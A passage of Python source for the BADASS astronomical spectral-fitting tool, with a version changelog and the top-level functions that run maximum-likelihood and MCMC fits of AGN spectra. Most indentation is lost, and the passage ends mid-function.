# - BPT diagnostic classification includes the classic Kewley+01 & Kauffmann+03 diagram to separate starforming from AGN dominated objects, but also the [SII]
# diagnostic to distinguish Seyferts from LINERs. The BPT classification is now written to the log file.
# - Store autocorrelation times and tolerances for each parameter in a dictionary and save to a `.npy` file
# - Cleaned up Notebook
# - Major changes and improvements in how monte carlo bootstrapping is performed for maximum likelihood and outflow testing functions.
# Version 7.0.0
# - Added minimum width for emission lines which improves outflow testing; this is based on the dispersion element of a single noise spike.
# - Emission lines widths are now measured as Gaussian dispersion (disp) instead of Gaussian FWHM (fwhm).
# - Added warning flags to best fit parameter files and logfile if parameters are consistent with lower or upper limits to within 1-sigma.
# - While is is *not recommended*, one can now test for outflows in the H-alpha/[NII] region independently of the H-beta/[OIII] region, as well as
# fit for outflows in this region. However, if the region includes H-beta/[OIII], then the default constraint is to still use [OIII]5007 to constrain
# outflow amplitude, dispersion, and velocity offset.
# - Plotting options, as well as a corner plot, added (default is *not* to output this file because it adds significant overhead)
# - More stable outflow testing and maximum likelihood estimation
# Version 7.1.0
# - Fixed a critical bug in resolution correction for emission lines
# - misc. bug fixes
# Version 7.2.0
# - Feature additions; one can suppress print output completely for use when
# running multiprocessing pool
# Version 7.3.0
# - Feature additions; Jupyter Notebook now supports multiprocessing in place
# of for loops which do not release memory.
# - Outflow test options; outflow fitting no longer constrains velocity offset
# to be less than core (blueshifted), and now only tests for blueshifts if
# option is selected. Only amplitude and FHWM are constrained.
# - Better outflow testing; tests now compare outflow to no-outflow models
# to check if there is significant improvement in residuals, as well as flags
# models in which the bounds are reached and good fits cannot be determined.
# Version 7.3.1-7.3.3
# - bug fixes.
# Version 7.4.0
# - changes to how outflow tests are performed; different residual improvement metric.
# - new default host galaxy template for non-LOSVD fitting; using MILES 10.0 Gyr SSP
# with a dispersion of 100 km/s that better matches absorption features.
# Version 7.4.1-7.4.3
# - writing outflow test metrics to log file for post-fit analysis
# - Improved outflow/max-likelihood fitting using scipy.optimize.basinhopping.
# While basinhopping algorithm requires more runtime, it produces a significantly
# better fit, namely for the power-law slope parameter which never varies with
# the SLSQP algorithm, which gets stuck in a local minimum.
# - Added F-statistic (ratio of variances between no outflow and outflow model)
# - Changed default outflow statistic settings
# - Bug fixes; fixed problems with parameters in 'list' option conv_type getting
# removed. Now if a user-defined parameter in conv_type is wrong or removed,
# it uses the remaining valid parameters for convergence, or defaults to 'median'.
# Version 7.5.0 - 7.5.3
# - test outflow residual statistic replaced with f-statistic (ratio-of-variances)
# to compare model residuals.
# - added interpolation of bad pixels based on SDSS flagged pixels.
# - bug fixes
# Version 7.6.0 - 7.6.8
# - Writing no-outflow parameters from test_outflows run to log file
# - bug fixes
# Version 7.7.0
# - NLS1 support; more detailed option for FeII template fitting (fwhm and voff
# fitting options); Lorentzian emission line profile option.
# - Kovacevic et al. 2010 FeII template added, which includes a parameter for
#   temperature.
# - Relaxed wavelength requirement for outflow tests for higher-redshift targets
# Version 7.7.1 (MNRAS Publication Version)
# - Added statistical F-test for ascertaining confidence between single-Gaussian
# and double-Gaussian models for the outflow test. Removed the ratio-of-variance
# test and replaced it with a sum-of-squares of residuals ratio.
# - Added "n_basinhop" to fit_options, which allows the user to choose how many initial
# basinhopping success iterations before a solution is achieved. This can
# drastically reduce the basinhopping fit time, at the expense of fit quality.
# - Bug fixes.
# Version 7.7.2 - 7.7.6
# - Fixed problem with FeII emission lines at the edge of the fitting region
# This is done by setting the variable edge_pad=0.
# - Fixed F-test NaN confidence bug
# - Updated initial fitting parameters in Jupyter notebook
# - Bug fixes and fixes to plots
# Version 8.0.0 - 8.0.13 major updates
# - Added smoothly broken power-law spectrum for high-z objects
# - Optimized FeII template fitting by utilizing PPXF framework
# - Added UV FeII+FeIII template from Vestergaard & Wilkes (2001)
# - Added Balmer continuum component
# - Added equivalent width calculations
# - Added additional chisquared fit statistic for outflow test
# - Voigt and Gauss-Hermite line profile options, with
# any number of higher order moments
# - Emission line list options (default and user-specified)
# - Control over soft- and hard constraints
# - Option for non-SDSS spectrum input
# - interpolation over metal absorption lines
# - masking of bad pixels, strong emission+absorption lines (automated), and user-defined masks
# - Various bug fixes, plotting improvements
# - new hypothesis testing for lines and outflows (F-test remains unchanged)
# - Continuum luminosities at 1350 Å, 3000 Å, and 5100 Å.
# - pathlib support
# - corner plots (corner.py) no longer supported; user should make their own corner plots with fewer free parameters
# - removed BPT diagram function; user should make BPT diagrams post processing.
# Version 8.0.14 - 8.0.15
# - Regular expressions now supported for soft constraints
# - IFU support for MANGA and MUSE (General) datasets
# Version 9.0.0 - 9.1.1
# - options for likelihood function
# - consolidated outflow and line testing routines
# Version 9.1.6
# - polynomial continuum components independent from LOSVD component.
# - linearization of non-linearized non-SDSS spectra using spectres module
##########################################################################################################
#### Run BADASS ##################################################################
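# Illustrative usage sketch. The directory path, object range, and option values below are
# hypothetical placeholders (not BADASS defaults), and the module is assumed to be importable
# as `badass`; run_BADASS() accepts either a parent directory of per-object folders (each
# containing a single .fits file) or a path to a single .fits file.
#
#   import badass
#   badass.run_BADASS("spectra/",                              # hypothetical parent directory of object folders
#                     nobj=(0, 10),                            # fit only the first 10 objects
#                     nprocesses=4,                            # number of worker processes
#                     fit_options={"fit_reg": (4400, 5500)},   # example fitting region in Angstroms
#                     mcmc_options={"mcmc_fit": False})        # maximum-likelihood fitting only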
def run_BADASS(data,
nobj=None,
nprocesses=None,
options_file=None,
dust_cache=None,
fit_options=False,
mcmc_options=False,
comp_options=False,
user_lines=None,
user_constraints=None,
user_mask=None,
combined_lines={},
losvd_options=False,
host_options=False,
power_options=False,
poly_options=False,
opt_feii_options=False,
uv_iron_options=False,
balmer_options=False,
outflow_test_options=False,
plot_options=False,
output_options=False,
sdss_spec=True,
ifu_spec=False,
spec=None,
wave=None,
err=None,
fwhm=None,
z=None,
ebv=None,
):
"""
	The top-level BADASS function. It handles the multiprocessing workers, each of which calls run_single_thread() on a single spectrum.
"""
# Determine the number of processes based on CPU count, if unspecified
if nprocesses is None:
nprocesses = int(np.ceil(mp.cpu_count()/2))
if os.path.isdir(data):
# Get locations of sub-directories for each fit within the parent data directory
spec_loc = natsort.natsorted(glob.glob(os.path.join(data, '*')))
if nobj is not None:
spec_loc = spec_loc[nobj[0]:nobj[1]]
work_dirs = [si + os.sep for si in spec_loc]
print(f"Fitting {len(spec_loc)} 1D spectra")
# Print memory of the python process at the start
process = psutil.Process(os.getpid())
print(f"Start process memory: {process.memory_info().rss/1e9:<30.8f}")
files = [glob.glob(os.path.join(wd, '*.fits'))[0] for wd in work_dirs]
arguments = [(pathlib.Path(file), options_file, dust_cache, fit_options, mcmc_options, comp_options, user_lines, user_constraints, user_mask,
combined_lines, losvd_options, host_options, power_options, poly_options, opt_feii_options, uv_iron_options, balmer_options,
outflow_test_options, plot_options, output_options, sdss_spec, ifu_spec, spec, wave, err, fwhm, z, ebv) for file in files]
# map arguments to function
if len(files) > 1:
pool = mp.Pool(processes=nprocesses, maxtasksperchild=1)
pool.starmap(run_single_thread, arguments, chunksize=1)
pool.close()
pool.join()
else:
run_single_thread(*arguments[0])
elif os.path.isfile(data):
# Print memory of the python process at the start
process = psutil.Process(os.getpid())
print(f"Start process memory: {process.memory_info().rss/1e9:<30.8f}")
run_single_thread(pathlib.Path(data), options_file, dust_cache, fit_options, mcmc_options, comp_options,
user_lines, user_constraints, user_mask, combined_lines, losvd_options, host_options, power_options, poly_options,
opt_feii_options, uv_iron_options, balmer_options, outflow_test_options, plot_options, output_options,
sdss_spec, ifu_spec, spec, wave, err, fwhm, z, ebv)
# Print memory at the end
print(f"End process memory: {process.memory_info().rss / 1e9:<30.8f}")
def run_single_thread(fits_file,
options_file = None,
dust_cache=None,
fit_options=False,
mcmc_options=False,
comp_options=False,
user_lines=None,
user_constraints=None,
user_mask=None,
combined_lines={},
losvd_options=False,
host_options=False,
power_options=False,
poly_options=False,
opt_feii_options=False,
uv_iron_options=False,
balmer_options=False,
outflow_test_options=False,
plot_options=False,
output_options=False,
sdss_spec =True,
ifu_spec =False,
spec = None,
wave = None,
err = None,
fwhm = None,
z = None,
ebv = None,
):
"""
	This is the main function; it calls all other sub-functions in order.
"""
if dust_cache != None:
IrsaDust.cache_location = str(dust_cache)
# Import options if options_file given
if options_file is not None:
try:
opt_file = pathlib.Path(options_file)
if not opt_file.exists():
raise ValueError("\n Options file not found!\n")
sys.path.append(str(opt_file.parent))
options = importlib.import_module(opt_file.stem)
# print("\n Successfully imported options file!\n")
if hasattr(options,"fit_options"):
fit_options = options.fit_options
if hasattr(options,"comp_options"):
comp_options = options.comp_options
if hasattr(options,"mcmc_options"):
mcmc_options = options.mcmc_options
if hasattr(options,"user_lines"):
user_lines = options.user_lines
if hasattr(options,"user_constraints"):
user_constraints = options.user_constraints
if hasattr(options,"user_mask"):
user_mask = options.user_mask
if hasattr(options,"losvd_options"):
losvd_options = options.losvd_options
if hasattr(options,"host_options"):
host_options = options.host_options
if hasattr(options,"power_options"):
power_options = options.power_options
if hasattr(options,"poly_options"):
poly_options = options.poly_options
if hasattr(options,"opt_feii_options"):
opt_feii_options = options.opt_feii_options
if hasattr(options,"uv_iron_options"):
uv_iron_options = options.uv_iron_options
if hasattr(options,"balmer_options"):
balmer_options = options.balmer_options
if hasattr(options,"plot_options"):
plot_options = options.plot_options
if hasattr(options,"output_options"):
output_options = options.output_options
if hasattr(options,"line_list"):
				user_lines = options.line_list
if hasattr(options,"soft_cons"):
				user_constraints = options.soft_cons
if hasattr(options,"combined_lines"):
combined_lines = options.combined_lines
except ImportError:
print("\n Error in importing options file! Options file must be a .py file!\n ")
# Check inputs; raises exception if user input is invalid.
fit_options = badass_utils.check_fit_options(fit_options,comp_options)
comp_options = badass_utils.check_comp_options(comp_options)
mcmc_options = badass_utils.check_mcmc_options(mcmc_options)
user_lines = badass_utils.check_user_lines(user_lines)
user_constraints = badass_utils.check_user_constraints(user_constraints)
user_mask = badass_utils.check_user_mask(user_mask)
losvd_options = badass_utils.check_losvd_options(losvd_options)
host_options = badass_utils.check_host_options(host_options)
power_options = badass_utils.check_power_options(power_options)
poly_options = badass_utils.check_poly_options(poly_options)
opt_feii_options = badass_utils.check_opt_feii_options(opt_feii_options)
uv_iron_options = badass_utils.check_uv_iron_options(uv_iron_options)
balmer_options = badass_utils.check_balmer_options(balmer_options)
plot_options = badass_utils.check_plot_options(plot_options)
output_options = badass_utils.check_output_options(output_options)
verbose = output_options["verbose"]
# Check user input spectrum if sdss_spec=False
if (not sdss_spec) and (not ifu_spec):
		# If the user does not provide an error spectrum, one is generated as 10% of the flux.
if err is None:
err = np.abs(0.1*spec)
spec, wave, err, fwhm, z, ebv = badass_utils.check_user_input_spec(spec,wave,err,fwhm,z,ebv)
# Unpack input
# fit_options
fit_reg = fit_options["fit_reg"]
good_thresh = fit_options["good_thresh"]
mask_bad_pix = fit_options["mask_bad_pix"]
mask_emline = fit_options["mask_emline"]
mask_metal = fit_options["mask_metal"]
fit_stat = fit_options["fit_stat"]
n_basinhop = fit_options["n_basinhop"]
test_outflows = fit_options["test_outflows"]
test_line = fit_options["test_line"]
max_like_niter = fit_options["max_like_niter"]
output_pars = fit_options["output_pars"]
cosmology = fit_options["cosmology"]
# mcmc_options
mcmc_fit = mcmc_options["mcmc_fit"]
nwalkers = mcmc_options["nwalkers"]
auto_stop = mcmc_options["auto_stop"]
conv_type = mcmc_options["conv_type"]
min_samp = mcmc_options["min_samp"]
ncor_times = mcmc_options["ncor_times"]
autocorr_tol = mcmc_options["autocorr_tol"]
write_iter = mcmc_options["write_iter"]
write_thresh = mcmc_options["write_thresh"]
burn_in = mcmc_options["burn_in"]
min_iter = mcmc_options["min_iter"]
max_iter = mcmc_options["max_iter"]
# comp_options
fit_opt_feii = comp_options["fit_opt_feii"]
fit_uv_iron = comp_options["fit_uv_iron"]
fit_balmer = comp_options["fit_balmer"]
fit_losvd = comp_options["fit_losvd"]
fit_host = comp_options["fit_host"]
fit_power = comp_options["fit_power"]
fit_poly = comp_options["fit_poly"]
fit_narrow = comp_options["fit_narrow"]
fit_broad = comp_options["fit_broad"]
fit_outflow = comp_options["fit_outflow"]
fit_absorp = comp_options["fit_absorp"]
tie_line_fwhm = comp_options["tie_line_fwhm"]
tie_line_voff = comp_options["tie_line_voff"]
n_moments = comp_options["n_moments"]
# plot_options
plot_param_hist = plot_options["plot_param_hist"]
plot_flux_hist = plot_options["plot_flux_hist"]
plot_lum_hist = plot_options["plot_lum_hist"]
plot_eqwidth_hist = plot_options["plot_eqwidth_hist"]
plot_HTML = plot_options["plot_HTML"]
# Set up run ('MCMC_output_#') directory
work_dir = os.path.dirname(fits_file)+"/"
run_dir,prev_dir = setup_dirs(work_dir,output_options['verbose'])
run_dir = pathlib.Path(run_dir)
# Check to make sure plotly is installed for HTML interactive plots:
if plot_HTML==True:
if importlib.util.find_spec('plotly'):
pass
else: plot_HTML=False
# output_options
write_chain = output_options["write_chain"]
verbose = output_options["verbose"]
#
# Start fitting process
print('\n > Starting fit for %s' % fits_file.parent.name)
sys.stdout.flush()
# Start a timer to record the total runtime
start_time = time.time()
#
# Determine validity of fitting region
min_fit_reg = 25 # in Å; set the minimum fitting region size here
if (sdss_spec) or (ifu_spec): # if user-input spectrum is an SDSS spectrum
#
fit_reg,good_frac = determine_fit_reg_sdss(fits_file, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose)
if (fit_reg is None) or ((fit_reg[1]-fit_reg[0]) < min_fit_reg):
print('\n Fitting region too small! The fitting region must be at least %d A! Moving to next object... \n' % (min_fit_reg))
cleanup(run_dir)
return None
elif (good_frac < fit_options["good_thresh"]) and (fit_reg is not None): # if fraction of good pixels is less than good_threshold, then move to next object
print('\n Not enough good channels above threshold! Moving onto next object...')
cleanup(run_dir)
return None
elif (good_frac >= fit_options["good_thresh"]) and (fit_reg is not None):
pass
elif (not sdss_spec): # if user-input spectrum is not an SDSS spectrum
fit_reg,good_frac = determine_fit_reg_user(wave, z, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose)
if (fit_reg is None) or ((fit_reg[1]-fit_reg[0]) < min_fit_reg):
print('\n Fitting region too small! The fitting region must be at least %d A! Moving to next object... \n' % (min_fit_reg))
cleanup(run_dir)
return None
elif (fit_reg is not None):
pass
# Prepare spectrum for fitting
# SDSS spectrum
if (sdss_spec):
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask = prepare_sdss_spec(fits_file, fit_reg, mask_bad_pix, mask_emline, user_mask, mask_metal, cosmology, run_dir, verbose=verbose, plot=True)
binnum = spaxelx = spaxely = None
# ifu spectrum
elif (ifu_spec):
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask,binnum,spaxelx,spaxely = prepare_ifu_spec(fits_file, fit_reg, mask_bad_pix, mask_emline, user_mask, mask_metal, cosmology, run_dir, verbose=verbose, plot=True)
# non-SDSS spectrum
elif (not sdss_spec):
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask = prepare_user_spec(fits_file, spec, wave, err, fwhm, z, ebv, fit_reg, mask_emline, user_mask, mask_metal, cosmology, run_dir, verbose=verbose, plot=True)
binnum = spaxelx = spaxely = None
# Write to Log
write_log((fit_options,mcmc_options,comp_options,losvd_options,host_options,power_options,poly_options,opt_feii_options,uv_iron_options,balmer_options,
plot_options,output_options),'fit_information',run_dir)
####################################################################################################################################################################################
# Generate host-galaxy template
if (fit_host==True) & (lam_gal[0]>1680.2):
host_template = generate_host_template(lam_gal, host_options, fwhm_gal,fit_mask, velscale, verbose=verbose)
elif (fit_host==True) & (lam_gal[0]<1680.2):
host_template = None
fit_host = False
comp_options["fit_host"]=False
if verbose:
print('\n - Host galaxy SSP template disabled because template is outside of fitting region.')
elif (fit_host==False):
host_template = None
# Load stellar templates if fit_losvd=True
if (fit_losvd==True):
stel_templates = prepare_stellar_templates(galaxy, lam_gal, fit_reg, velscale, fwhm_gal,fit_mask, losvd_options, run_dir)
elif (fit_losvd==False):
stel_templates = None
# For the Optical FeII, UV Iron, and Balmer templates, we disable the templates if the fitting region
# is entirely outside of the range of the templates. This saves resources.
# Check conditions for and generate Optical FeII templates
# Veron-Cetty et al. (2004)
if (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="VC04") & (lam_gal[-1]>=3400.0) & (lam_gal[0]<=7200.0):
opt_feii_templates = initialize_opt_feii(lam_gal,opt_feii_options,fwhm_gal,fit_mask,velscale)
elif (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="VC04") & ((lam_gal[-1]<3400.0) | (lam_gal[0]>7200.0)):
if verbose:
print('\n - Optical FeII template disabled because template is outside of fitting region.')
fit_opt_feii = False
comp_options["fit_opt_feii"]=False
opt_feii_templates = None
write_log((),'update_opt_feii',run_dir)
# Kovacevic et al. (2010)
elif (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="K10") & (lam_gal[-1]>=4400.0) & (lam_gal[0]<=5500.0):
opt_feii_templates = initialize_opt_feii(lam_gal,opt_feii_options,fwhm_gal,fit_mask,velscale)
elif (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="K10") & ((lam_gal[-1]<4400.0) | (lam_gal[0]>5500.0)):
if verbose:
print('\n - Optical FeII template disabled because template is outside of fitting region.')
opt_feii_templates = None
fit_opt_feii = False
comp_options["fit_opt_feii"]=False
opt_feii_templates = None
write_log((),'update_opt_feii',run_dir)
elif (fit_opt_feii==False):
opt_feii_templates = None
# Generate UV Iron template - Vestergaard & Wilkes (2001)
if (fit_uv_iron==True) & (lam_gal[-1]>=1074.0) & (lam_gal[0]<=3100.0):
uv_iron_template = initialize_uv_iron(lam_gal,uv_iron_options,fwhm_gal,fit_mask,velscale)
elif (fit_uv_iron==True) & ((lam_gal[-1]<1074.0) | (lam_gal[0]>3100.0)):
if verbose:
print('\n - UV Iron template disabled because template is outside of fitting region.')
uv_iron_template = None
fit_uv_iron = False
comp_options["fit_uv_iron"]=False
uv_iron_template = None
write_log((),'update_uv_iron',run_dir)
elif (fit_uv_iron==False):
uv_iron_template = None
# Generate Balmer continuum
if (fit_balmer==True) & (lam_gal[0]<3500.0):
balmer_template = initialize_balmer(lam_gal,balmer_options,fwhm_gal,fit_mask,velscale)
elif (fit_balmer==True) & (lam_gal[0]>=3500.0):
if verbose:
print('\n - Balmer continuum disabled because template is outside of fitting region.')
balmer_template = None
fit_balmer = False
comp_options["fit_balmer"]=False
balmer_template = None
write_log((),'update_balmer',run_dir)
elif (fit_balmer==False):
balmer_template = None
####################################################################################################################################################################################
# Initialize maximum likelihood parameters
if verbose:
print('\n Initializing parameters for Maximum Likelihood Fitting.')
print('----------------------------------------------------------------------------------------------------')
param_dict, line_list, combined_line_list, soft_cons = initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='init',fit_stat=fit_stat,
fit_opt_feii=fit_opt_feii,fit_uv_iron=fit_uv_iron,fit_balmer=fit_balmer,
fit_losvd=fit_losvd,fit_host=fit_host,fit_power=fit_power,fit_poly=fit_poly,
fit_narrow=fit_narrow,fit_broad=fit_broad,fit_outflow=fit_outflow,fit_absorp=fit_absorp,
tie_line_fwhm=tie_line_fwhm,tie_line_voff=tie_line_voff,verbose=verbose)
# Output all free parameters of fit prior to fitting (useful for diagnostics)
if output_pars and verbose:
output_free_pars(line_list,param_dict,soft_cons)
write_log((line_list,param_dict,soft_cons),'output_line_list',run_dir)
return
elif not output_pars and verbose:
output_free_pars(line_list,param_dict,soft_cons)
write_log((line_list,param_dict,soft_cons),'output_line_list',run_dir)
elif not output_pars and not verbose:
write_log((line_list,param_dict,soft_cons),'output_line_list',run_dir)
#### Line Testing ################################################################################################################################################################################
if (test_line["bool"]==True):
# If line test, check to make sure line is in line list
if (isinstance(test_line["line"],str)) and (test_line["line"] not in line_list):
shutil.rmtree(run_dir)
print("\n Line to test not found in line list! Make sure line is within fitting region for test.\n")
return
elif (isinstance(test_line["line"],list)) and not (np.all([False if line not in line_list else True for line in test_line["line"]])):
shutil.rmtree(run_dir)
print("\n Line to test not found in line list! Make sure line is within fitting region for test.\n")
return
if verbose:
print("\n Testing for %s" % (test_line["line"]))
line_test(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
fit_reg,
user_lines,
user_constraints,
combined_lines,
test_line,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=False,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose,
binnum=binnum,
spaxelx=spaxelx,
spaxely=spaxely)
# Exit BADASS
print(' - Line testing complete for %s! \n' % fits_file.parent.name)
return
####################################################################################################################################################################################
#### Outflow Testing ################################################################################################################################################################################
if (test_outflows==True):
# If test_outflow, check to make sure the line list has outflow lines in it
if (len([line for line in line_list if line_list[line]["line_type"]=="out"])==0):
shutil.rmtree(run_dir)
print("\n There are no outflow lines in the line list to test! Make sure fit_outflow = True and are within fitting range.\n")
return
if verbose:
print("\n Testing for outflows...")
line_test(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
fit_reg,
user_lines,
user_constraints,
combined_lines,
test_line,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=True,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose,
binnum=binnum,
spaxelx=spaxelx,
spaxely=spaxely)
# Exit BADASS
print(' - Outflow testing complete for %s! \n' % fits_file.parent.name)
return
####################################################################################################################################################################################
	# Perform maximum likelihood
result_dict, comp_dict = max_likelihood(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=False,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose)
if (mcmc_fit==False):
# If not performing MCMC fitting, terminate BADASS here and write
# parameters, uncertainties, and components to a fits file
# Write final parameters to file
# Header information
header_dict = {}
header_dict["z_sdss"] = z
header_dict["med_noise"] = np.median(noise)
header_dict["velscale"] = velscale
#
write_max_like_results(result_dict,comp_dict,header_dict,fit_mask,run_dir,binnum,spaxelx,spaxely)
# Make interactive HTML plot
if plot_HTML:
plotly_best_fit(fits_file.parent.name,line_list,fit_mask,run_dir)
print(' - Done fitting %s! \n' % fits_file.parent.name)
sys.stdout.flush()
return
#######################################################################################################
# Initialize parameters for emcee
if verbose:
print('\n Initializing parameters for MCMC.')
print('----------------------------------------------------------------------------------------------------')
param_dict, line_list, combined_line_list, soft_cons = initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='final',fit_stat=fit_stat,
fit_opt_feii=fit_opt_feii,fit_uv_iron=fit_uv_iron,fit_balmer=fit_balmer,
fit_losvd=fit_losvd,fit_host=fit_host,fit_power=fit_power,fit_poly=fit_poly,
fit_narrow=fit_narrow,fit_broad=fit_broad,fit_outflow=fit_outflow,fit_absorp=fit_absorp,
tie_line_fwhm=tie_line_fwhm,tie_line_voff=tie_line_voff,
remove_lines=False,verbose=verbose)
#
if verbose:
output_free_pars(line_list,param_dict,soft_cons)
#
# Replace initial conditions with best fit max. likelihood parameters (the old switcharoo)
for key in result_dict:
if key in param_dict:
param_dict[key]['init']=result_dict[key]['med']
	# We make an exception for the FeII temperature if the Kovacevic et al. (2010) templates are used, because
	# the temperature is not very sensitive above 8,000 K. This can cause the temperature parameter to blow up
	# during the initial max. likelihood fitting, causing it to be initialized for MCMC at an
	# unreasonable value. We therefore re-initialize the FeII temperature start value to 10,000 K.
if 'feii_temp' in param_dict:
param_dict['feii_temp']['init']=10000.0
#######################################################################################################
# Run emcee
if verbose:
print('\n Performing MCMC iterations...')
print('----------------------------------------------------------------------------------------------------')
# Extract relevant stuff from dicts
param_names = [key for key in param_dict ]
init_params = [param_dict[key]['init'] for key in param_dict ]
bounds = [param_dict[key]['plim'] for key in param_dict ]
# Check number of walkers
# If number of walkers < 2*(# of params) (the minimum required), then set it to that
if nwalkers<2*len(param_names):
if verbose:
print('\n Number of walkers < 2 x (# of parameters)! Setting nwalkers = %d' % (2.0*len(param_names)))
nwalkers = int(2.0*len(param_names))
ndim, nwalkers = len(init_params), nwalkers # minimum walkers = 2*len(params)
# initialize walker starting positions based on parameter estimation from Maximum Likelihood fitting
pos = initialize_walkers(init_params,param_names,bounds,soft_cons,nwalkers,ndim)
# Run emcee
# args = arguments of lnprob (log-probability function)
lnprob_args=(param_names,
bounds,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir)
emcee_data = run_emcee(pos,ndim,nwalkers,run_dir,lnprob_args,init_params,param_names,
auto_stop,conv_type,min_samp,ncor_times,autocorr_tol,write_iter,write_thresh,
burn_in,min_iter,max_iter,verbose=verbose)
sampler_chain, burn_in, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, log_like_blob = emcee_data
# Add chains to each parameter in param dictionary
for k,key in enumerate(param_names):
if key in param_dict:
param_dict[key]['chain']=sampler_chain[:,:,k]
if verbose:
print('\n > Fitting MCMC chains...')
	# The following functions produce parameter, flux, luminosity, equivalent-width, and other histograms and chains from the MCMC sampling.
# Free parameter values, uncertainties, and plots
param_dict = param_plots(param_dict,burn_in,run_dir,plot_param_hist=plot_param_hist,verbose=verbose)
# Add tied parameters
param_dict = add_tied_parameters(param_dict, line_list)
# Log Like Function values plots
log_like_dict = log_like_plot(log_like_blob, burn_in, nwalkers, run_dir, plot_param_hist=plot_param_hist,verbose=verbose)
# Flux values, uncertainties, and plots
flux_dict = flux_plots(flux_blob, burn_in, nwalkers, run_dir, plot_flux_hist=plot_flux_hist,verbose=verbose)
# Luminosity values, uncertainties, and plots
lum_dict = lum_plots(flux_dict, burn_in, nwalkers, z, run_dir, H0=cosmology["H0"],Om0=cosmology["Om0"],plot_lum_hist=plot_lum_hist,verbose=verbose)
# Continuum luminosity
cont_lum_dict = cont_lum_plots(cont_flux_blob, burn_in, nwalkers, z, run_dir, H0=cosmology["H0"],Om0=cosmology["Om0"],plot_lum_hist=plot_lum_hist,verbose=verbose)
# Equivalent widths, uncertainties, and plots
eqwidth_dict = eqwidth_plots(eqwidth_blob, burn_in, nwalkers, run_dir, plot_eqwidth_hist=plot_eqwidth_hist, verbose=verbose)
# Auxiliary Line Dict (Combined FWHMs and Fluxes of MgII and CIV)
int_vel_disp_dict = int_vel_disp_plots(int_vel_disp_blob, burn_in, nwalkers, z, run_dir, H0=cosmology["H0"],Om0=cosmology["Om0"],plot_param_hist=plot_param_hist,verbose=verbose)
# If stellar velocity is fit, estimate the systemic velocity of the galaxy;
# SDSS redshifts are based on average emission line redshifts.
extra_dict = {}
extra_dict["LOG_LIKE"] = log_like_dict
if ('stel_vel' in param_dict):
if verbose:
print('\n > Estimating systemic velocity of galaxy...')
z_dict = systemic_vel_est(z,param_dict,burn_in,run_dir,plot_param_hist=plot_param_hist)
extra_dict = {**extra_dict, **z_dict}
if verbose:
print('\n > Saving Data...')
# Write all chains to a fits table
if (write_chain==True):
write_chains({**param_dict,**flux_dict,**lum_dict,**cont_lum_dict,**eqwidth_dict,**int_vel_disp_dict},run_dir)
# Plot and save the best fit model and all sub-components
comp_dict = plot_best_model(param_dict,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir)
# Calculate some fit quality parameters which will be added to the dictionary
	# These will be appended to param_dict and need to be in the same format: {"med": ..., "std": ..., "flag": ...}
fit_quality_dict = fit_quality_pars(param_dict,line_list,combined_line_list,comp_dict,fit_mask,fit_type="mcmc",fit_stat=fit_stat)
param_dict = {**param_dict,**fit_quality_dict}
# Write best fit parameters to fits table
# Header information
header_dict = {}
header_dict["Z_SDSS"] = z
header_dict["MED_NOISE"] = np.median(noise)
header_dict["VELSCALE"] = velscale
#
param_dict = {**param_dict,**flux_dict,**lum_dict,**eqwidth_dict,**cont_lum_dict,**int_vel_disp_dict,**extra_dict}
write_params(param_dict,header_dict,bounds,run_dir,binnum,spaxelx,spaxely)
# Make interactive HTML plot
if plot_HTML:
plotly_best_fit(fits_file.parent.name,line_list,fit_mask,run_dir)
if verbose:
